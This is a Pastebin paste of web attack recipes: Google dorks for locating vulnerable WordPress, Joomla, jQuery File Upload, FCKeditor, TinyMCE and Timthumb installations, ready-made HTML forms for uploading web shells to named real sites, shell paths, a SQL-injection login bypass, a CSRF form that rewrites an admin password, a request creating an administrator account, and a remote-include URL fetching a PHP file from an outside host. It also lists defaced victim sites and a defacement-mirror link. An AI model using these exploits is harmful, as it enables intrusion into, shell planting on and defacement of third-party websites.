Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ojs xploit
- ===================================
- wordpress
- dork: /wp-admin/install.php
- example:
- site.com/wp-admin/install.php
- ========================
- dork: inurl:/wp-content/themes/project10-themes/
- exploit script:
- <form enctype="multipart/form-data" action="http://ogrencikariyeri.com/haber/wp-content/themes/project10-theme/functions/upload-handler.php" method="post">Please Choose a File: <input name="orange_themes" type="file" /><br/ >
- <input type="submit" value="upload" />
- path: http://127.0.0.1/wordpress/wp-content/uploads/year/month/up.php
- =================================
- need tamper
- Exploit Title: Baruque Casa Remote File Upload Vulnerability # Google Dork: intext:Copyright Baruque Casa. # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code :
- dork: inurl admin upload_file asp
- <form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
- # Exploit admin/server/php/ # Successful {"files[{"name":"b6fa0f07f57514815d1b310a6b97d70e.jpeg","size":5362,"type":"image\/jpeg","url":"http:\/\/www.baruquecasa.com.br\/admin\/server\/php\/fotos\/b6fa0f07f57514815d1b310a6b97d70e.jpeg" # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo http://www.baruquecasa.com.br/admin/server/php/
- ==================================
- #Exploit Author:- HACKER WAHAB
- #Author Website:-HTTP://WWW.HACKERWAHAB.COM/
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Save it as .html and Run See Video ;)
- Code:-
- <html>
- <body>
- <form action="http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="vrt_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- ==================================
- jquery xploit
- By Clash Hackers:
- jquery file upload vulnerability:
- Dork : /assets/global/plugins/jquery-file-upload/
- Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
- Script CSRF :
- <form method="POST" action="http://localhost/assets/global/plugins/jquery-file-upload/server/php/"
- enctype="multipart/form-data">
- <input type="file" name="files[]" /><button>Upload</button>
- </form>
- #Clash_Hackers
- www.fb.com/Clash.Hackers.page
- ==================================
- csrf xploit working
- xploiter: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
- xploit uploader:
- <DOCTYPE! html>
- <html> <form name="f" method="post" enctype="multipart/form-data" action="https://copypaste.ph/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td>Nueva imagen:</td> <td><input name="file" type="file" size="30"></td> <td align="right"> <input type="submit" name="submit" value="Transferir"> </td> </tr> </table> </form> </td> </tr> <tr> <td> </td> </tr> </table> </body> </html>
- ====================
- CSRF XPLOIT
- <form name="myform" method="post"
- action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update"
- enctype="multipart/form-data">
- <input type="hidden" name="admin_name" value="admin2">
- <input type="hidden" name="admin_email" value="[email protected]">
- <input type="hidden" name="admin_password" value="admin">
- </form>
- <script>document.myform.submit();</script>
- =================================
- Exploit Title: CSRF Vulnerability (Tinymce plugins imgsurfer) Version: 4.1.2 Date: 1-01-2018 Tested on: Linux Google Dork: inurl:/tinymce/plugins/imgsurfer/ Video Poc:https://www.youtube.com/watch?v=pL-0-fmDVCE&t=213s Category: webapps Exploit Author: Legion BOmb3r contact:[email protected] Greetz to my team ErrOr SquaD https://www.tinymce.com/ ################################################## Description The vulnerability allows an attacker upload shell ..... Proof of Concept: http://www.site.com/tinymce/plugins/imgsurfer/main.php CSRF code:
- <DOCTYPE! html>
- <html> <form name="f" method="post" enctype="multipart/form-data" action="http://www.site.com/tinymce/plugins/imgsurfer/main.php"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td>Nueva imagen:</td> <td><input name="file" type="file" size="30"></td> <td align="right"> <input type="submit" name="submit" value="Transferir"> </td> </tr> </table> </form> </td> </tr> <tr> <td> </td> </tr> </table> </body> </html>
- ==================================
- Google dork: inurl:/wp-content/plugins/viral-optins/
- Exploit: https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
- =========================
- <form method="POST" action="https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data" >
- <input type="file" name="Filedata"></center><br>
- <input type="submit" name="Submit" value="Upload">
- </form>
- ==================================
- Dork : /index.php/index/user/register
- : /index.php/index/user/register stain
- -----------------------------------
- Exploit : /index.php/index/user/register
- -----------------------------------
- Path Shell : /files/journals/1/articles/(ID)/submission/original/(Random nama shell .phtml)
- ==================================
- dork
- inurl:admin/fckeditor site:pl
- http://alexan.com.ph/mailinglist_new/admin/FCKeditor/editor/filemanager/browser/default/browser.html?
- idugtong sa browser.htl connector=connectors/asp/connector.php
- ==================================
- xploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
- dork: inurl:"/sitefinity/login.aspx"
- ==================================
- dork: inurl:/plugins/imageuploader/
- lagay lang sa dulo ng site
- ●
- /assets/js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php
- +++++++++++++××++×××+××+××××××××××+
- wp xploit
- 1.ilagay lng sa dulo ng site ung
- ● /post-a-job/
- dork: inurl: wp-content/upload/job-manager-uploads/
- sample:https://unhrd.org/post-a-job/
- ++++++++++++++++++++++++++++++++++
- #Exploit Author:- HACKER WAHAB
- #Author Website:-HTTP://WWW.HACKERWAHAB.COM/
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Save it as .html and Run See Video ;)
- Code:-
- <html>
- <body>
- <form action="http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="vrt_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- +++++++++++++++++++++++++++++++
- dork:inurl:"/?q=contacto" site:gob.ar
- path: /sites/default/files/webform/yunghtmlmo.html
- +++++++++++++++++++++++++++++++++
- zap xploit use tamper data
- Inurl: /wp-content/plugins/woocommerce-product-options/includes/image-upload.php
- ++++++++++++++++++++++++++++++++
- dork:
- ●inurl:/wp-content/themes/purevision/sliders/
- ● inurl:/wp-content/themes/purevision/sliders/
- Exploit : /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php
- ++++++++++++++++++++++++++++++++1
- Dork :
- - inurl:/admin/login.php
- - inurl:/administrator/ intitle:login
- - inurl:/admin/ intitle:panel
- test: http://www.lenovoshowroomtelangana.in/administrator/
- bypass admin
- bypass admin:
- Username : '=''or' atau '=' 'or'
- Password : '=''or' atau '=' 'or'
- ++++++++++++++++++++++++++++++++++
- Dork = inurl:wp-content/themes/qaengine
- Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator
- ++++++++++++++++++++++++++++++++++
- admin/FCKeditor/ xploit working
- xploiter: site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
- dork: inurl:advert_detail.php?id=
- path: site.com/files/clownsec.html
- ++++++++++++++++++++++++++++++++++
- Joomla xploit working
- dork: inurl:viewtable?cid= site:it
- lagay mo sa link nasa baba
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- path: site.com/media/shell.html
- +++++++++++++++++++++++++++++++++
- elfinder/files xploit
- dork: inurl: "elfinder/files"
- xploiter: http://www.simplifieddigitalmarketing.com/asu.php
- ++++++++++++++++++++++++++++++++++
- Timthumb exploit working
- vul version 1.30
- dork: inurl:/timthumb.php?src=
- 1.find timthumb.php source
- 2.site.com/timthumb.php
- ?src=http://flickr.com.phuoclongcomputer.com/up.php
- ++++++++++++++++++++++++++++++++++
- Arbitrary exploit
- Save the file as html :) Exploit Title: Arbitrary File Upload Vulnerability in Estatik <br>
- Dork : inurl:/wp-content/plugins/estatik/
- <br> <br> Exploit : <br><hr>
- <html> <body> <form action="www.TARGET.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="es_prop_media_images" /> <input type="file" name="es_media_images[]" /> <input type="submit" value="Submit" /> </form> </body> </html>
- ++++++++++++++++++++++++++++++++++
- working
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shellname.php
- exploit
- <html>
- <body>
- <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="drm_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- ++++++++++++++++++++++++++++++++++
- dork: inurl: /wp-content/plugins/Tevolution/tmplconnector/monitize/templatic-custom_fields/Demo
- <form
- action="http://site.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
- method="post"
- enctype="multipart/form-data">
- <label for="file">Filename:</label>
- <input type="file" name="Filedata" ><br>
- <input type="submit" name="submit" value="Upload">
- </form>
- ++++++++++++++++++++++++++++++++++
- ++++++++++++++++++++++++++++++++++
- Joomla Arbitrary File Upload Vulnerability
- # 1:Search Google Dork and Choose a Target
- Dork : inurl:viewtable?cid= site:it
- # 2: exploit:
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- # 3: upload shell.php or index.html
- # 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
- Demo :
- http://www.aquoschemical.it/sito/medi...
- http://www.centroolisticoitaliano.it/...
- CONTACT ME:
- https://web.facebook.com/FOXILITRIX.0
- http://www.ghostshockey.it/media/r3dfl4g.html
- http://www.nordnetimmobiliare.it/media/r3dfl4g.html
- https://mirror-h.org/zone/1504323/
- ~R3DFL4G~
- ++++++++++++++++++++++++++++++++++
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement